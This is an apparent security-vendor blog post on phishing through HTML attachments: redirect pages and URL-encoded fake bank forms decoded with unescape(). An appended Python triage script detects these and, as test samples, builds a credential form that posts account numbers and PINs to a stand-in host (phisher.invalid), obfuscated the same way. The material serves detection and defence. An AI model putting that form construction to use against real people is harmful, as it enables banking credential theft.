Local Phishing Using HTML Attachments 

Apr 24, 2009 06:52 PM

We have recently come across a different type of phishing attack that involves JavaScript being used to attempt to trick users into submitting sensitive banking-related information. This type of attack usually carries an HTML file attachment. The HTML file will locally open a look-alike bank submission form with the capability to pass critical user information to the phisher’s server.

Case 1

In the past, we monitored attacks with a similar type of file attachment, but they contained straightforward redirection code. There are different ways to redirect users to the desired location. One of the simpler HTML codes for redirection is shown below:

[Image: sample HTML redirection code]

Sample image of the message:

[Image: sample phishing message]

When the user opens the attachment, the redirection code is executed and the phishing site opens. However, this approach has a limitation: even though the phishing link stays hidden inside the attachment, once the page is opened in a web browser, various anti-fraud tools may catch the link and block it.



Case 2

The Change in Approach: This modified version not only hides the HTML code from the human eye, but may also find its way past anti-fraud tools. Here, the HTML code is URL encoded and JavaScript is used to render the decoded output as an HTML page. URL encoding the code makes the lines hard to understand without first decoding them into human-readable form.


Contents of the attached HTML file (URL encoded):

[Image: URL-encoded contents of the attached HTML file]

As shown in the example above, the JavaScript function “unescape” is used to decode and render the HTML file for the user. When we decoded the above lines, we obtained the full JavaScript code.


Contents of the attached HTML file (decoded):

[Image: decoded contents of the attached HTML file]

This file is opened as a “local” HTML file, as shown below:

[Image: decoded page opened as a local HTML file]

The address bar of the browser will show something similar to the examples given below. These paths vary with the user's preferences and operating system:

1. If the file is saved on the desktop:

file:///C:/Documents%20and%20Settings/user_name/Desktop/banknamehidden%20Bank-Account%20confirmation%20form.pdf.htm

2. If the file is opened directly from the mail client:

file:///C:/DOCUME~1/USERNAME_~1/LOCALS~1/Temp/banknamehidden%20Bank-Account%20confirmation%20form.pdf-2.htm

[Image: snapshot of the phishing e-mail message]

As shown in the message snapshot above, the user is encouraged to open the attachment. The name of the attached file can be another point of confusion for the user. Some examples of the filenames include:

    Account reset form.pdf.htm
    Bank-Account confirmation form.pdf.htm


Today, most banks send their account statements in PDF format. Users may think that the attached file is a PDF and subsequently be tricked into opening an HTML file.

In addition, the HTML page shown above looks like an authentic bank home page, so users may be tricked into entering their bank information (credit card number or bank account details). This data is collected and sent to the phisher’s server using an HTTP POST request. Currently this attack is limited to phishing, but the tactic could easily be used for other malicious activities as well.
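The two cases above share a small set of indicators that a mail gateway or analyst can check without opening the attachment in a browser: a double extension such as `.pdf.htm`, a meta-refresh or `location` redirect (Case 1), an `unescape()` call wrapping a percent-encoded body (Case 2), and, once that body is decoded, a form that POSTs to an external host and asks for credentials. The following triage script is an added example written for this post; it is not Symantec code, and the sample attachments, the `phisher.invalid` hostname and all function names are constructed for illustration.

```python
"""Triage an HTML e-mail attachment for the local-phishing indicators described
above: a plain redirect (Case 1) or a percent-encoded body revealed by
JavaScript unescape() that renders a credential form posting off-host (Case 2).
Added example, not Symantec code; hosts, paths and samples are constructed."""
import re
from urllib.parse import quote, urlparse

UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S | re.I)
META_REFRESH = re.compile(r"""<meta[^>]+http-equiv\s*=\s*["']?refresh""", re.I)
JS_REDIRECT = re.compile(r"""(?:window\.|document\.|top\.)?location(?:\.href)?\s*=[^=]|location\.replace\(""", re.I)
FORM_TAG = re.compile(r"<form\b[^>]*>", re.I)
ATTR = r"""{}\s*=\s*["']?([^\s"'>]+)"""
DOUBLE_EXT = re.compile(r"\.[a-z0-9]{2,4}\.html?$", re.I)   # e.g. "form.pdf.htm"
SENSITIVE = re.compile(r"""type\s*=\s*["']?password|\b(?:card|account|acct|pin|ssn|cvv)""", re.I)


def js_unescape(s: str) -> str:
    """Mirror JavaScript unescape(): %uXXXX first, then %XX, each to one code point."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def decode_layers(html: str, max_depth: int = 5) -> list:
    """Return the attachment itself plus every unescape() payload, decoded recursively."""
    layers, pending = [], [html]
    while pending and len(layers) < max_depth:
        cur = pending.pop(0)
        layers.append(cur)
        for _quote, payload in UNESCAPE_CALL.findall(cur):
            pending.append(js_unescape(payload))
    return layers


def attr(tag: str, name: str) -> str:
    """Pull one attribute value out of a raw tag string (quoted or unquoted)."""
    m = re.search(ATTR.format(name), tag, re.I)
    return m.group(1) if m else ""


def analyze_attachment(filename: str, html: str) -> dict:
    """Collect the indicators across the raw file and all decoded layers."""
    layers = decode_layers(html)
    findings = {
        "double_extension": bool(DOUBLE_EXT.search(filename)),
        "unescape_layers": len(layers) - 1,
        "meta_refresh": False,
        "js_redirect": False,
        "external_post_targets": [],   # hostnames that receive the submitted form
        "asks_for_credentials": False,
    }
    for layer in layers:
        findings["meta_refresh"] |= bool(META_REFRESH.search(layer))
        findings["js_redirect"] |= bool(JS_REDIRECT.search(layer))
        findings["asks_for_credentials"] |= bool(SENSITIVE.search(layer))
        for tag in FORM_TAG.findall(layer):
            action = urlparse(attr(tag, "action"))
            if attr(tag, "method").lower() == "post" and action.scheme in ("http", "https"):
                findings["external_post_targets"].append(action.hostname)
    return findings


def verdict(f: dict) -> str:
    """Map the indicators onto the two cases described in the post."""
    if f["external_post_targets"] and (f["unescape_layers"] or f["asks_for_credentials"]):
        return "local-phishing-form"
    if f["meta_refresh"] or f["js_redirect"]:
        return "redirect"
    return "clean"


# Constructed samples standing in for the attachments shown in the post's images.
CASE1_REDIRECT = ('<html><head><meta http-equiv="refresh" '
                  'content="0;url=http://phisher.invalid/login"></head></html>')

DECODED_FORM = ('<html><body><h1>Bank-Account confirmation form</h1>'
                '<form method="POST" action="http://phisher.invalid/collect.php">'
                'Account number <input name="account_number"> '
                'PIN <input type="password" name="pin">'
                '<input type="submit" value="Confirm"></form></body></html>')
# Percent-encode the whole page and wrap it in document.write(unescape(...)),
# which is the Case 2 construction; safe="" encodes every non-alphanumeric byte.
CASE2_ENCODED = ('<html><head><script type="text/javascript">'
                 'document.write(unescape("' + quote(DECODED_FORM, safe="") + '"));'
                 '</script></head></html>')

if __name__ == "__main__":
    for name, body in (("statement.htm", CASE1_REDIRECT),
                       ("Bank-Account confirmation form.pdf.htm", CASE2_ENCODED)):
        f = analyze_attachment(name, body)
        print(name, "->", verdict(f), f)
```

The script treats every decoded layer the same way as the raw file, so a second round of `unescape()` inside the decoded body is still caught (up to `max_depth`). The regexes are deliberately loose heuristics for triage; anything flagged `local-phishing-form` or `redirect` is a candidate for quarantine and a closer look, not a proof on its own.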

Symantec is continuously monitoring this trend and advises users to be cautious when opening attachments of the HTML file type, especially when they have arrived from an unknown source.
